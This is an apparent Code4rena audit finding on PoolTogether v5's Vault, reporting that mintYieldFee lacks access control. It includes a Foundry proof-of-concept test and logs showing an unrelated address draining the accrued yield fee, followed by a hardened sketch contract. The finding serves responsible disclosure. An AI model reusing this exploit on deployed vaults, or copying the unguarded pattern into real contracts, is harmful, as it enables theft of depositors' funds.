code-423n4 / 2023-07-pooltogether-findings


Missing access control in mintYieldFee allowing everybody to mint the available YieldFee to himself #403

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/GenerationSoftware/pt-v5-vault/blob/b1deb5d494c25f885c34c83f014c8a855c5e2749/src/Vault.sol#L394-L402

Vulnerability details

Impact

Everybody can call the mintYieldFee function in the Vault, when there is _yieldFeeTotalSupply available, and mint shares to himself for free, which later results in stealing funds from the Vault. (If this is a desired behavior, which it shouldn't be based on the docs, the function can still be frontrun, and result in a malicious actor minting shares for free.)

Proof of Concept

Everybody can call the mintYieldFee function in the Vault, when there is _yieldFeeTotalSupply which is increased in the liquidate function at https://github.com/GenerationSoftware/pt-v5-vault/blob/b1deb5d494c25f885c34c83f014c8a855c5e2749/src/Vault.sol#L550-L587. The liquidator is out of scope for this contest, this is why the _yieldFeeTotalSupply was increased manually. Example: After executing liquidate we have _yieldFeeTotalSupply = 5 * 1e9;

```solidity
function testMintYieldFee() public {
    // Alice is the configured yield fee recipient; Bob is an unrelated address.
    vault.setYieldFeeRecipient(alice);
    // vault._increaseYieldFeeBalance(5 * 1e9); <== simulates the result of liquidate function call

    vm.startPrank(alice);
    console.log('Balance of bob before: ', vault.balanceOf(bob));
    console.log('Yield fee total supply: ', vault.yieldFeeTotalSupply());
    console.log('Yield Fee Recipient: ', vault.yieldFeeRecipient());
    console.log('Bob address: ', bob);
    // The full accrued fee is minted to Bob, who is not the yield fee recipient.
    vault.mintYieldFee(5000000000, bob);
    console.log('Yield fee total after: ', vault.yieldFeeTotalSupply());
    console.log('Balance of bob after: ', vault.balanceOf(bob));
    console.log('Balance of alice after: ', vault.balanceOf(alice));
    vm.stopPrank();
}
```

The result will be:

```
Logs:
  Balance of bob before:  0
  Yield fee total supply:  5000000000
  Yield Fee Recipient:  0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea
  Bob address:  0x4dBa461cA9342F4A6Cf942aBd7eacf8AE259108C
  Yield fee total after:  0
  Balance of bob after:  5000000000
  Balance of alice after:  0
```

Tools Used

Manual Review

Recommended Mitigation Steps

Add a modifier in the mintYieldFee function that requires the caller or the receiver to be the yieldFeeRecipient.

Assessed type

Access Control
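The recommended mitigation applied to a stripped-down stand-in contract, as an added example that is not the PoolTogether Vault's code: the storage names and error names follow the finding, but the contract body, the `accrueYieldFee` hook and the `onlyYieldFeeRecipient` modifier are assumptions for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// Constructed stand-in for the yield-fee accounting of a vault (not pt-v5-vault).
/// It shows mintYieldFee gated so that only the configured yield fee recipient
/// can claim accrued fee shares, and the shares always land on that recipient.
contract YieldFeeVaultSketch {
    address private _yieldFeeRecipient;
    uint256 private _yieldFeeTotalSupply;
    mapping(address => uint256) public balanceOf;

    error NotYieldFeeRecipient(address caller);
    error YieldFeeGTAvailable(uint256 requested, uint256 available);
    event MintYieldFee(address indexed caller, address indexed recipient, uint256 shares);

    constructor(address yieldFeeRecipient_) {
        _yieldFeeRecipient = yieldFeeRecipient_;
    }

    /// The missing check from the finding: reject every caller except the recipient.
    modifier onlyYieldFeeRecipient() {
        if (msg.sender != _yieldFeeRecipient) revert NotYieldFeeRecipient(msg.sender);
        _;
    }

    function yieldFeeRecipient() external view returns (address) { return _yieldFeeRecipient; }
    function yieldFeeTotalSupply() external view returns (uint256) { return _yieldFeeTotalSupply; }

    /// Constructed test hook standing in for the fee accrual that `liquidate` performs
    /// in the real Vault; a production contract would not expose this publicly.
    function accrueYieldFee(uint256 shares) external { _yieldFeeTotalSupply += shares; }

    /// Hardened version: without the modifier any address could drain the accrued fee.
    /// Minting to the stored recipient rather than a caller-supplied address also removes
    /// the frontrunning variant described in the finding.
    function mintYieldFee(uint256 shares) external onlyYieldFeeRecipient {
        if (shares > _yieldFeeTotalSupply) revert YieldFeeGTAvailable(shares, _yieldFeeTotalSupply);
        _yieldFeeTotalSupply -= shares;
        balanceOf[_yieldFeeRecipient] += shares;
        emit MintYieldFee(msg.sender, _yieldFeeRecipient, shares);
    }
}
```

Re-running the PoC above against this sketch from any address other than the recipient reverts with NotYieldFeeRecipient, and the yield fee total stays untouched.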

c4-judge commented 1 year ago

Picodes marked the issue as duplicate of #406

c4-judge commented 11 months ago

Picodes marked the issue as satisfactory